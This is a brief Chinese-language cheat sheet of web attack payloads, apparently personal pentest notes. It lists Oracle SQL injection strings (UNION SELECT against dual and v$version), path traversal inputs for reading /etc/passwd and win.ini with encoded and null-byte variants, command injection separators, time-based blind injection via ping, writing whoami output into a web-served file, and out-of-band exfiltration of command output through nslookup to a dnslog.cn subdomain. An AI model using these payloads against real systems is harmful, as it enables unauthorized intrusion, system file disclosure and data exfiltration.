一、代码执行

1、file_get_contents函数 

<?php echo file_get_contents('文件路径')；?>

file_get_contents() 是 PHP 中的一个函数，用于将文件的内容读入到一个字符串中。这个函数可以用于读取本地文件或远程 URL 的内容。它的使用非常灵活，支持通过上下文选项进行更高级的文件读取操作，如设置代理、超时时间或自定义的 User-Agent 头部信息等，以满足特定的需求。此外，如果服务器操作系统支持，file_get_contents() 还会使用内存映射技术来增强性能，使其在处理大文件时也能保持较高的效率

二、Oracle数据库注入

'+UNION+SELECT+NULL,NULL+FROM+dual--测试有几列数据

'+UNION+SELECT+BANNER,NULL+FROM+v$version--

三、目录穿越

   ../../../etc/passwd

..\..\..\windows\win.ini

....//或者....\/

filename=/etc/passwd

url编码或者些不太标准的编码：

%2e%2e%2f and %252e%252e%252f and ..%c0%af or ..%ef%bc%8f

文件名截断：

../../../etc/passwd%00.png

四、命令执行

1、&执行的命令例如echo&

2、`执行的命令`

3、$(执行的命令)

4、'或者"用来结束之前的命令

5、echo abcdefghij输出命令

6、ping -c 10 10.10.100.1时间盲注可以让命令执行10秒

7、文件注入命令

    whoami > /var/www/static/whoami.txt

   然后访问http://域名/whoami.txt

8、nslookup `whoami`.dnslog.cn命令外带